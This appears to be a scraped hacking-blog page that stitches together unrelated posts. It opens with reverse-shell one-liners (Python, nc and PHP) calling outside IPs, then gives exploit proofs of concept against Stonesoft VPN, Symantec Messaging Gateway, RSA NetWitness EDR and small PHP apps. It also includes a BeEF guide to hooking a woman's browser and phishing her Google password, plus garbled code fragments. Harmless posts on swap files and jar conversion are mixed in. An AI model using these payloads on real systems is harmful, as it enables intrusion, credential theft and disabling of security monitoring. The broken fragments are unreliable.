python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('47.98.229.211',27409));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/','-i']);'
Pose three nc
If there is nc on the target machine and the -e parameter exists, then a reverse shell can be created
Attack aircraft monitoring
nc -lvvp 5555 target machine execution
nc 47.98.229.211 5555 -t -e /bin/This will bounce the target machine's /bin/to the attack machine
However, many Linux NCs are castrated versions. If the target machine does not have NC or does not have the -e option, it is not recommended to use NC methods.
Pose Four php
Attack aircraft monitoring
nc -lvvp 4444 requires the target machine to have php and then execute
php -r '$sock=fsocopen('172.16.1.130',4444);exec('/bin/sh -i 3 3 23');'
Some other high-energy operations
About PHP payload
Now perform simple configuration in msfconsole
msf use exploit/multi/handler
msf exploit(handler) set payload windows/meterpreter/reverse_tcp
payload=windows/meterpreter/reverse_tcp
msf exploit(handler) set LHOST 192.168.1.107
LHOST=192.168.1.107PHP?
php error_reporting(0); $ip='x.x.x.x'; $port=53; if (($f='stream_socket_client') is_callable($f)) {
{$port}'); $s_type='stream'; } if (!$s ($f='fsocckopen') is_callable($f)) { $s=$f($ip, $port); $s_
strlen($b)); break; case 'socket': $b .=socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock']=$s;
$GLOBALS['msgsock_type']=$s_type; if (extension_loaded('s
HireHackking

Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation

HACKER · %s · %s

# Exploit Title: Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation # Exploit Author : TOUHAMI KASBAOUI # Vendor Homepage : https://www.forcepoint.com/ # Software: Stonesoft VPN Windows # Version : 6.2.0 / 6.8.0 # Tested on : Windows 10 # CVE : N/A #Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM #define UNICODE #define _UNICODE #include <Windows.h> #include <iostream> using namespace std; enum Result { unknown, serviceManager_AccessDenied, serviceManager_DatabaseDoesNotExist, service_AccessDenied, service_InvalidServiceManagerHandle, service_InvalidServiceName, service_DoesNotExist, service_Exist }; Result ServiceExists(const std::wstring& serviceName) { Result r = unknown; SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ); if (manager == NULL) { DWORD lastError = GetLastError(); if (lastError == ERROR_ACCESS_DENIED) return serviceManager_AccessDenied; else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST) return serviceManager_DatabaseDoesNotExist; else return unknown; } SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ); if (service == NULL) { DWORD error = GetLastError(); if (error == ERROR_ACCESS_DENIED) r = service_AccessDenied; else if (error == ERROR_INVALID_HANDLE) r = service_InvalidServiceManagerHandle; else if (error == ERROR_INVALID_NAME) r = service_InvalidServiceName; else if (error == ERROR_SERVICE_DOES_NOT_EXIST) r = service_DoesNotExist; else r = unknown; } else r = service_Exist; if (service != NULL) CloseServiceHandle(service); if (manager != NULL) CloseServiceHandle(manager); return r; } bool ChangeName() { LPCWSTR parrentvpnfilename = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe"; LPCWSTR newName = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn_old.exe"; bool success = MoveFile(parrentvpnfilename, newName); if (success) { cerr << "[+] SVGVPN filename changed.\n"; } else { cerr << "Failed to rename file \n"; } return 0; } int main() { const uint8_t shellcode[7168] = { 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; //You can set array bin of your reverse shell PE file here std::wstring serviceName = L"sgipsecvpn"; Result result = ServiceExists(serviceName); if (result == service_Exist) std::wcout << L"The VPN service '" << serviceName << "' exists." << std::endl; else if (result == service_DoesNotExist) std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl; else std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl; ChangeName(); HANDLE fileHandle = CreateFile(L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); cerr << "[*] Loading Malicious file into main PE of Forcepoint Installer \n"; if (fileHandle == INVALID_HANDLE_VALUE) { cerr << "Failed to create shellcode\n"; return 1; } DWORD bytesWritten; if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) { cerr << "Failed to write to file\n"; CloseHandle(fileHandle); return 1; } CloseHandle(fileHandle); cout << "[+] Payload exported to ForcePointVPN \n"; Sleep(30); cout << "[+] Restart ForcePointVPN Service \n"; SC_HANDLE scmHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); SC_HANDLE serviceHandle = OpenService(scmHandle, TEXT("sgipsecvpn"), SERVICE_ALL_ACCESS); SERVICE_STATUS serviceStatus; QueryServiceStatus(serviceHandle, &serviceStatus); if (serviceStatus.dwCurrentState == SERVICE_RUNNING) { ControlService(serviceHandle, SERVICE_CONTROL_STOP, &serviceStatus); while (serviceStatus.dwCurrentState != SERVICE_STOPPED) { QueryServiceStatus(serviceHandle, &serviceStatus); Sleep(1000); } } StartService(serviceHandle, NULL, NULL); CloseServiceHandle(serviceHandle); CloseServiceHandle(scmHandle); return 0; }
HireHackking
# Exploit Title: Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS) # Exploit Author: omurugur # Vendor Homepage: https://support.broadcom.com/external/content/SecurityAdvisories/0/21117 # Version: 10.7.4-10.7.13 # Tested on: [relevant os] # CVE : CVE-2022-25630 # Author Web: https://www.justsecnow.com # Author Social: @omurugurrr An authenticated user can embed malicious content with XSS into the admin group policy page. Example payload *"/><svg/onload=prompt(document.domain)>* POST /brightmail/admin/administration/AdminGroupPolicyFlow$save.flo HTTP/1.1 Host: X.X.X.X Cookie: JSESSIONID=xxxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 652 Origin: https://x.x.x.x Referer: https://x.x.x.x/brightmail/admin/administration/AdminGroupPolicyFlow$add.flo Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close pageReuseFor=add&symantec.brightmail.key.TOKEN=xxx&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=&fullAdminRole=true&statusRole=true&statusViewOnly=false&reportRole=true&reportViewOnly=false&policyRole=true&policyViewOnly=false&settingRole=true&settingViewOnly=false&adminRole=true&adminViewOnly=false&submitRole=true&submitViewOnly=false&quarantineRole=true&quarantineViewOnly=false&selectedFolderRights=2&ids=0&complianceFolderIds=1&selectedFolderRights=2&ids=0&complianceFolderIds=10000000 Regards, Omur UGUR
HireHackking

Title: Centos7 adds virtual memory (swap)

HACKER · %s · %s

1. Check memory usage
Check the usage of virtual memory before swap is added
free -m
2. Create swap file
Use the dd command to create a swap file with a size of 2G
dd if=/dev/zero of=/home/swap bs=1024 count=2048000 The larger the file, the more factory the time it is created.
3. Convert to swap format
Convert file format to swap format
mkswap /home/swap
4. Mount the swap partition
Use the swapon command to mount the swap partition to the swap partition
swapon /home/swap If an error is reported: swapon: /home/swap: insecure permissions 0644, 0600 suggested.
Modify permissions:
chmod 600 /home/swap
5. Check the memory usage again
Pay attention to the changes in observation and 1.
free -m
6. Setting up restart is still valid
To prevent the swap partition from becoming 0 after restart, you need to modify the /etc/fstab file:
At the end of the file (the last line)
/home/swap swap swap default 0 0
7. Deactivate virtual memory
swapoff -v /home/swap
HireHackking

Title: How to tease girls in the Intranet

HACKER · %s · %s

Environmental description:
kali linux(192.168.0.114) Heikuidi device win7 (192.168.0.113) Girls' pc
Meet beef
BEEF (The Browser Exploitation Framework): A browser attack framework developed in Ruby language, a module installed by default in Kali, used to implement attacks and exploitation of XSS vulnerabilities.
BeEF mainly inserts a JS script code called hook.js into the web page. If the browser visits a page with hook.js (hook), it will be hooked (hooked). The hooked browser will execute the initial code to return some information. Then the target host will send a request to the BeEF server every once in a while (default is 1 second), asking whether there is new code to be executed. BeEF servers are essentially like web applications, divided into front-end and back-end. The front-end will poll the back-end whether there is new data that needs to be updated. At the same time, the front-end can also send instructions to the back-end. BeEF holders can log in to the back-end of BeEF through the browser to control the front-end (user's browser). BeEF is generally used in conjunction with XSS vulnerabilities.
Start BEEF
Method 1: Click the icon in the column to start.
Method 2: Execute the command beef-xss
Kali has already made beef-xss a service, and we can also use the systemctl command to start or close the beef service
systemctl start beef-xss.service #Enable beef service
systemctl stop beef-xss.service #Close beef service
systemctl restart beef-xss.service #Restart beef service Note: The initial configuration requires us to enter our account and password (set it yourself)
After startup is completed, it will automatically jump to the browser's management page. Enter the account number and password we just set and log in to the system. The initial account and password are beef
Configure our hooks
There are two methods to briefly talk about here:
Method 1: Find a website containing xss vulnerability and insert js to achieve the attack target.
Method 2: Write a poisonous web page yourself for others to visit. (Internal network + external network)
Here we take Method 2 as the column: write a simple page.
!doctype html
html
head
meta charset='utf-8'
title la la la la la la la la la/title
/head
Body
h1bbskali.cn/h1
script src='http://192.168.0.114:3000/hook.js'/script
/body
/html
In other words, find a way to get others to visit the page I just wrote. You can achieve the target of the attack. There are many methods, such as man-in-the-middle attack, redirection, black page hanging, etc.
Attack Demo
Demo 1 (device online)
When the attack side visits our web page, we can see the online device in the beef console.
Device Attack
Click on our device and select the commands tab. We can see that there are many attack modules.
Readers may find that there is a small circle logo with color (green, gray, orange, red) in front of each module.
Internally, BeEF can detect which command modules can work in the currently victimized browser and indicate in color:
Green: The command module can run on the target browser, and the user will not feel any abnormalities.
Orange: The command module can run on the target browser, but the user may feel abnormal (such as pop-ups, prompts, jumps, etc.)
Gray: The command module has not been verified for this target, i.e. it is not known whether it can be run.
Red: The command module does not work for this target
Here are a few modules for you. Everyone else entertains themselves!
Let the browser automatically access the specified website
Click Browser--hooked Doman--Redirect Browser Enter our target URL and click Execute to complete the attack. Return to the page I just opened and found that I automatically jumped to the kali forum.

Pop up dialog box
Click Browser--hooked Doman --Create Alert Dialog to enter the information we want to pop up and click Execute to complete the attack.
The effect is as follows
Popt the input information box
Click Browser--hooked Doman --Create Prompt Dialog to enter the information we want to pop up and click Execute to complete the attack.
In the same way, after we enter the information, we can see the information we just entered in the management panel!
Results
Make a phishing website
Select Scoial Engineering--Google phishing to our kali ip address. Click Execute
Our page has become Google's login page
Enter our account number and password
Password obtained
HireHackking

Restaurant Management System 1.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: Restaurant Management System 1.0 - SQL Injection # Date: 2023-03-20 # Exploit Author: calfcrusher (calfcrusher@inventati.org) # Vendor Homepage: https://www.sourcecodester.com/users/lewa # Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html # Version: 1.0 # Tested on: Apache 2.4.6, PHP 5.4.16 Endpoint: /rms/delete-order.php Vulnerable parameter: id (GET) Time Base SQL Injection payloads http://example.com/rms/delete-order.php?id=1'or+sleep(5)%3b%23 http://example.com/rms/delete-order.php?id=122'+and+(select+1+from+(select(sleep(3)))calf)--
HireHackking

ActFax 10.10 - Unquoted Path Services

HACKER · %s · %s

# Exploit Title: ActFax 10.10 - Unquoted Path Services # Date: 22/03/2023 # Exploit Author: Birkan ALHAN (@taftss) # Vendor Homepage: https://www.actfax.com # Software Link: https://www.actfax.com/en/download.html # Version: Version 10.10, Build 0551 (2023-02-01) # Tested on: Windows 10 21H2 OS Build 19044.2728 #Discover to Unquoted Services Path: C:\Users\taftss>sc qc ActiveFaxServiceNT [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ActiveFaxServiceNT TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ActiveFax-Server-Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\taftss>systeminfo Host Name: RedsTaftss OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19044 N/A Build 19044 #Another Discover Methot to Unquoted Services Path: wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ #Exploit: If the attacker has taken over the system and the taken user has write privileges to the "C:\Program Files\ActiveFax" folder or "C:\", they can inject their own malicious "ActSrvNT.exe" file. Then the ActiveFaxServiceNT Service can be restarted to privilege escalation. -- *Birkan ALHAN*
HireHackking

Title: Discovering intranet surviving hosts based on UDP/ARP

HACKER · %s · %s

UDP introduction:
UDP (User Datagram Protocol) is a connectionless protocol, which is in the fourth layer-transport layer, and is at the upper layer of the IP protocol. UDP has the disadvantage of not providing packet packets, assembling, and not being able to sort data packets. That is, after the message is sent, it is impossible to know whether it has arrived safely and completely.
UDP significant features:
1.UDP lacks reliability. UDP itself does not provide mechanisms such as confirmation, timeout retransmission, etc. UDP datagrams may be copied and reordered in the network, and there is no guarantee that each datagram will only arrive once. 2. UDP datagrams have lengths. Each UDP datagram has a length, and if a datagram reaches its destination correctly, the length of the datagram will be passed along with the data to the receiver. TCP is a byte stream protocol without any (on the protocol) record boundary. 3.UDP is connected without connection. There is no need for a long-term relationship between UDP clients and servers. Most UDP implementations choose to ignore the source station suppression errors. When network congestion is caused, the destination cannot receive a large number of UDP datagrams. 4. UDP supports multicast and broadcasting.
Use nmap to scan
nmap -sU -T5 -sV --max-retries 1 192.168.0.1/24 -p 500 or
nmap -sU -T4 -sV 192.168.0.1/24
msf scan
msf5 use auxiliary/scanner/discovery/udp_probe
msf5 auxiliary(scanner/discovery/udp_probe) show options
Module options (auxiliary/scanner/discovery/udp_probe):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/discovery/udp_probe) set RHOSTS 192.168.0.1/24
RHOSTS=192.168.0.1/24
msf5 auxiliary(scanner/discovery/udp_probe) set THREADS 10
THREADS=10
msf5 auxiliary(scanner/discovery/udp_probe) run

Or execute
use auxiliary/scanner/discovery/udp_sweep
ARP Introduction:
ARP, a network transmission protocol that is extremely important in network protocol packets by parsing network layer addresses. Get a TCP/IP protocol for physical address based on IP address. When the host sends information, it broadcasts an ARP request containing the target IP address to all hosts on the network and receives a return message to determine the target's physical address.
nmap scan
nmap -sn -PR 192.168.0.1/24
Popularization of OSI seven-layer model diagram

HireHackking
# Exploit Title: RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] RSA Security www.netwitness.com [Product] NetWitness Endpoint EDR Agent The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response. [Vulnerability Type] Incorrect Access Control / Code Execution [CVE Reference] CVE-2022-47529 [Security Issue] CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands. Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification. Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report. SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d LANDeskService.exe [Severity] Critical [Impact(s)] Denial-of-Service Arbitrary Code Execution [Attack Vector] To exploit, open handle to memory objects held by the endpoint agent, modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group [Affected Product Code Base] All versions prior to v12.2 [Network Access] Local [References] https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935 [Vuln Code Block]: 00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:00000001400F7B10 ; sub_14013BA50+19?p .text:00000001400F7B10 ; DATA XREF: ... .text:00000001400F7B10 push rbx .text:00000001400F7B12 sub rsp, 20h .text:00000001400F7B16 mov rbx, rcx .text:00000001400F7B19 test rcx, rcx .text:00000001400F7B1C jz short loc_1400F7B5C .text:00000001400F7B1E call cs:InitializeCriticalSection .text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection .text:00000001400F7B28 call cs:InitializeCriticalSection .text:00000001400F7B2E mov edx, 1 ; bManualReset .text:00000001400F7B33 xor r9d, r9d ; lpName .text:00000001400F7B36 mov r8d, edx ; bInitialState .text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes .text:00000001400F7B3B call cs:CreateEventW .text:00000001400F7B41 mov [rbx+50h], rax .text:00000001400F7B45 mov dword ptr [rbx+58h], 0 .text:00000001400F7B4C test rax, rax .text:00000001400F7B4F jz short loc_1400F7B5C [Exploit/POC] "RSA_NetWitness_Exploit.c" #include "windows.h" #include "stdio.h" #include "accctrl.h" #include "aclapi.h" #define OPEN_ALL_ACCESS 0x1F0003 /* RSA NetWitness EDR Endpoint Agent Tamper Protection Bypass / EoP Code Execution RSA NetWitness.msi --> NWEAgent.exe MD5: c0aa7e52cbf7799161bac9ebefa38d49 Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent. Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user. By John Page (hyp3rlinx) - Nov 2022 DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse. Users of this supplied PoC code accept all risks, do no harm. X64 PE file vuln code block: 00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:00000001400F7B10 ; sub_14013BA50+19?p .text:00000001400F7B10 ; DATA XREF: ... .text:00000001400F7B10 push rbx .text:00000001400F7B12 sub rsp, 20h .text:00000001400F7B16 mov rbx, rcx .text:00000001400F7B19 test rcx, rcx .text:00000001400F7B1C jz short loc_1400F7B5C .text:00000001400F7B1E call cs:InitializeCriticalSection .text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection .text:00000001400F7B28 call cs:InitializeCriticalSection .text:00000001400F7B2E mov edx, 1 ; bManualReset .text:00000001400F7B33 xor r9d, r9d ; lpName .text:00000001400F7B36 mov r8d, edx ; bInitialState .text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes .text:00000001400F7B3B call cs:CreateEventW .text:00000001400F7B41 mov [rbx+50h], rax .text:00000001400F7B45 mov dword ptr [rbx+58h], 0 .text:00000001400F7B4C test rax, rax .text:00000001400F7B4F jz short loc_1400F7B5C 1) Install "RSA NetWitness.msi" (Endpoint EDR Agent) 2) Run Exploit PoC as a Standard non-admin user, the PoC will: a) Open a handle (copy) to Ecat002 event. b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to Everyone group. c) Set/Reset event the Ecat002 handle. d) if admin privs change the EDR service configuration Non vulnerable agents will output "Not vulnerable to the console", customers can modify and use test to see if vuln. */ char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"}; BOOL PWNED=FALSE; void Exploit(); int AdminChl(); void HijackSvcConfig(); int main(void){ printf("[+] RSA NetWitness EDR Agent 0Day\n"); printf("[+] CVE-2022-47529\n"); printf("[+] Discovery: John Page (aka hyp3rlinx)\n"); printf("[+] ===================================\n"); Exploit(); if( AdminChk() ){ printf("[+] Hijacked NetWitness Agent Service!\n"); HijackSvcConfig(); } Sleep(2000); printf("[+] Done!\n\n"); system("pause"); return 0; } void Exploit(){ PACL pOldDACL = NULL; PACL pNewDACL = NULL; HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002"); int i=0; for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){ HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]); if(hEvent != INVALID_HANDLE_VALUE){ printf("[-] Targeting Event: %s\n", Vuln_Events[i]); Sleep(500); if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){ TRUSTEE trustee[1]; trustee[0].TrusteeForm = TRUSTEE_IS_NAME; trustee[0].TrusteeType = TRUSTEE_IS_GROUP; trustee[0].ptstrName = TEXT("Everyone"); trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE; trustee[0].pMultipleTrustee = NULL; EXPLICIT_ACCESS explicit_access_list[1]; ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS)); explicit_access_list[0].grfAccessMode = DENY_ACCESS; explicit_access_list[0].grfAccessPermissions = GENERIC_ALL; explicit_access_list[0].grfInheritance = NO_INHERITANCE; explicit_access_list[0].Trustee = trustee[0]; if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){ printf("%s%d", "[!] Not vulnerable! ", GetLastError()); } if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ printf("%s%d", "[!] Not vulnerable! ", GetLastError()); }else{ SetEvent(hEvent_Ecat002); Sleep(1000); ResetEvent(hEvent_Ecat002); CloseHandle(hEvent_Ecat002); SetEvent(hEvent); Sleep(1000); PWNED=TRUE; } if(PWNED){ LocalFree(pNewDACL); LocalFree(pOldDACL); CloseHandle(hEvent); } Sleep(1000); } } } } //If run as admin, modify the agent service config to run our own code. int AdminChk(){ int result = 0; HANDLE hToken = NULL; if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){ TOKEN_ELEVATION elevated; DWORD tokSize = sizeof(TOKEN_ELEVATION); if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){ result = elevated.TokenIsElevated; } } if(hToken){ CloseHandle(hToken); } return result; } //Trivial example modify the service config... void HijackSvcConfig(){ Sleep(1000); WinExec("sc failure NWEAgent command= ""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0); } [POC Video URL] https://www.youtube.com/watch?v=kO1fu4IOlSs [Disclosure Timeline] Vendor Notification: December 2, 2022 CVE assigned: December 19, 2022 Hotfix v12.1.0.1: January 3, 2023 Fixed in v12.2.0.0 January 4, 2023 Restested for vendor: January 6, 2023 March 24, 2023 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
HireHackking

Title: Convert java executable.jar to exe file

HACKER · %s · %s

The biggest feature of Java file jar is cross-platform, but the more troublesome thing is that we need to install the Java environment. It's very simple for professionals, but it's relatively bloated for other users. Today, let’s talk about how to save jar files as exe files.
Software used
eclipseexe4j
Generate jar file
Run eclipse to open our project.
Select the project-export-jar file
As shown in the figure, remove the √ in front of lib and setting (config) and the √ in front of classpath project and set the saved name.
Click next step to set the main class and click to finish!
Generate jar to exe
Run exe4j to select jar in exe mode
Create a new folder, preferably the same name as the project. Copy the lib and settings under the project and the jar file we generated to this directory.
Set the generated name and the location of the file just created
Click Next, set the name, icon, click Advanced Settings, set compatible with 32 and 64-bit systems
Add our runnable jar file, the library file that has been used in the project lib
Setting version
Then go all the way down!
HireHackking

Medicine Tracker System v1.0 - Sql Injection

HACKER · %s · %s

# Exploit Title: Medicine Tracker System v1.0 - Sql Injection # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip # Version: V1.0.0 # Tested on: Windows/Linux # Proof of Concept: # 1- http://localhost/php-mts/app/login.php # 2- login with default credential # 3- Click left side Manage account and fill Update User Details and click update account # 4- Capture request using burp suite # 5- Save request request.txt Sqlmap POST /php-mts/classes/Users.php?f=save_user HTTP/1.1 Host: localhost Content-Length: 661 sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeOo3CzyRX6fHexZx X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-mts/app/?page=manage_account Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql Connection: close ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="id" 1'-' ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="firstname" gogo ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="middlename" ogo ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="lastname" singh ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="username" mayuri.infospace@gmail.com ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="password" 12345678 ------WebKitFormBoundaryeOo3CzyRX6fHexZx-- sqlmap sqlmap -r request.txt -p "id" --dbs --batch ___ __H__ ___ ___["]_____ ___ ___ {1.6.12#stable} |_ -| . ['] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 13:18:01 /2023-03-21/ [13:18:01] [INFO] parsing HTTP request from 'request.txt' it appears that provided value for POST parameter 'id' has boundaries. Do you want to inject inside? ('' or true*--') [y/N] N [13:18:01] [INFO] resuming back-end DBMS 'mysql' [13:18:01] [INFO] testing connection to the target URL [13:18:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=' or true AND (SELECT 3138 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(3138=3138,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mDhI--&name=para&description=ss Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=' or true AND (SELECT 8994 FROM (SELECT(SLEEP(5)))doso)-- HjCh--&name=para&description=ss --- [13:18:01] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.54, PHP 8.0.25 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:18:01] [INFO] fetching database names [13:18:01] [INFO] resumed: 'information_schema' [13:18:01] [INFO] resumed: 'art_gallery' [13:18:01] [INFO] resumed: 'hcpms' [13:18:01] [INFO] resumed: 'mts_db' [13:18:01] [INFO] resumed: 'mysql' [13:18:01] [INFO] resumed: 'performance_schema' [13:18:01] [INFO] resumed: 'phpmyadmin' [13:18:01] [INFO] resumed: 'sscdms_db' [13:18:01] [INFO] resumed: 'test' available databases [9]: [*] art_gallery [*] hcpms [*] information_schema [*] mts_db [*] mysql [*] performance_schema [*] phpmyadmin [*] sscdms_db [*] test [13:18:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.2' [*] ending @ 13:18:01 /2023-03-21/
HireHackking

Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)

HACKER · %s · %s

